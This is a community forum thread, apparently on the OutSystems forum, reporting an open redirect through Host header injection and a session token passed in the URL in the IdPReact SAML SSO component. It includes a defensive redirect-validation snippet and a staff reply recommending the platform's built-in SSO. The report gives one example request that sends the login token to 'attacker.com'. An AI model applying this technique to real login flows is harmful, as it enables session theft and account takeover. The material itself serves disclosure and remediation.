Solved
[IdPReact] Open Redirection via Host Header and Session token in URL Vulnerability
idp-react
Forge asset by Telmo Martins
Application Type: Reactive
Service Studio Version: 11.54.18 (Build 62611)
Platform Version: 11.17.0 (Build 36616)

During vulnerability testing of an application that uses the IdPReact component, we have identified 2 vulnerabilities in the IdP application used for Single Sign-On (SSO) using SAML 2.0:

  • Open Redirection via Host Header Injection leads to Account Takeover: an attacker capable of modifying the Host header within the HTTP request sent to the backend can redirect the flow of requests to an arbitrary domain. This vulnerability becomes particularly significant when a request containing the login token is made because it could be intercepted by the attacker and used to compromise the user's session. In particular, a malicious agent can capture the token of the victim user by modifying the Host header and the OriginalURL parameter in the login request, e.g. "/IdPReact/IdPLogin?Token=&OriginalURL=https://attacker.com", sending the token to the domain "attacker.com".
  • Session token in URL: Inserting session tokens into URLs increases the risk of potential attackers gaining possession of these tokens, thereby allowing them to obtain and use a valid session for the application without having access to any credentials. Specifically, the session token is transmitted within the 'Token' parameter in the GET request to /IdPReact/IdPLogin. This could potentially compromise the session if an attacker manages to view the system log of a middleware capable of recording the requests made.

Is there a way to address these 2 vulnerabilities?

Thanks in advance for your support and contribution.

Kind Regards,

Gabriele
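The first issue described above boils down to the backend trusting two request-controlled values, the Host header and the OriginalURL parameter, when it builds the post-login redirect. As an added example (not code from IdPReact, its author, or OutSystems), the Python below shows the defensive shape of that logic: the redirect target is accepted only if it is a path-absolute relative reference or an absolute URL on an explicitly allow-listed host, the Host header is checked against the same allow-list and never used to construct URLs, and absolute URLs are assembled from a configured canonical base instead. The host names and the canonical base are constructed placeholders.

```python
from urllib.parse import urljoin, urlsplit

# Constructed sample configuration: the only hosts the IdP may send a browser to,
# and the canonical origin used to build absolute URLs (never the Host header).
ALLOWED_HOSTS = {"idp.example.com", "app.example.com"}
CANONICAL_BASE = "https://idp.example.com"
DEFAULT_LANDING = "/"


def safe_redirect_target(original_url, allowed_hosts=ALLOWED_HOSTS, default=DEFAULT_LANDING):
    """Return a redirect target that cannot leave the allow-listed hosts.

    Accepted forms:
      * a path-absolute relative reference ("/IdPReact/Home?x=1"), but not a
        protocol-relative one ("//other.example")
      * an absolute http(s) URL whose netloc (host[:port], including any
        userinfo) is exactly one of the allow-listed hosts
    Anything else, including empty input, other schemes and values with
    backslashes or control characters, falls back to `default`.
    """
    if not original_url:
        return default
    candidate = original_url.strip()
    # Browsers normalise "\" to "/", so "/\\other.example" would become
    # protocol-relative after the check; reject backslashes and control bytes.
    if "\\" in candidate or any(ord(ch) < 0x20 for ch in candidate):
        return default
    parts = urlsplit(candidate)
    if parts.scheme == "" and parts.netloc == "":
        # Relative reference: keep it only if it is path-absolute and not "//...".
        if candidate.startswith("/") and not candidate.startswith("//"):
            return candidate
        return default
    if parts.scheme not in ("http", "https"):
        return default
    # Comparing the whole netloc (not just hostname) means userinfo tricks such
    # as "https://app.example.com@other.example/" and unexpected ports fail.
    if parts.netloc.lower() in allowed_hosts:
        return candidate
    return default


def build_post_login_redirect(request_host, original_url, canonical_base=CANONICAL_BASE):
    """Compute the absolute post-login redirect for a request.

    Returns None when the Host header is not one the IdP serves, so the caller
    can answer 400 instead of proceeding. The absolute URL is always built from
    the configured canonical base, never from the incoming Host header.
    """
    host = (request_host or "").strip().lower()
    if host not in ALLOWED_HOSTS:
        return None
    target = safe_redirect_target(original_url)
    # urljoin keeps an absolute target untouched and resolves a relative one
    # against the canonical base.
    return urljoin(canonical_base, target)


if __name__ == "__main__":
    # Constructed sample inputs modelled on the parameters named in the post.
    for host, url in [
        ("idp.example.com", "/IdPReact/Home"),
        ("idp.example.com", "https://app.example.com/landing"),
        ("idp.example.com", "https://other.example/"),
        ("other.example", "/IdPReact/Home"),
    ]:
        print(f"Host={host!r} OriginalURL={url!r} -> {build_post_login_redirect(host, url)!r}")
```

In a real deployment the allow-list would come from configuration, and the session token itself should travel in a secure, HttpOnly cookie or a POST body rather than the query string, so that even a correctly validated redirect never places it in proxy or server logs.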

2020-10-08 19-51-35
João Barata
Staff
Solution

Hi @Gabriele Gimelli,

Thank you for reporting this.

If you are on version 11.10.0 or above, you should be able to remove the IdPReact usage altogether and instead enable the Single Sign On between app types in Service Center.

https://success.outsystems.com/documentation/11/managing_the_applications_lifecycle/secure_the_applications/configure_app_authentication/
This is in fact the recommended way to use the component. IdPReact was a temporary implementation while the above feature hadn't yet been released on the platform.

You will need to enable secure cookies in Lifetime before you are able to enable the setting above.
https://success.outsystems.com/documentation/11/developing_an_application/secure_the_application/enable_secure_session_cookies_and_set_application_cookies_as_secure/#secure-session-cookies

After enabling the setting, you will be able to use the "IdP_SSO_URL" and "IdP_SingleLogout_URL" in your reactive application directly without having to use the actions from IdPReact.
This will also improve the end-user experience with one less redirect in the authentication flow.

In any case, I'll try to work on a way to fix the issues reported.

Regards,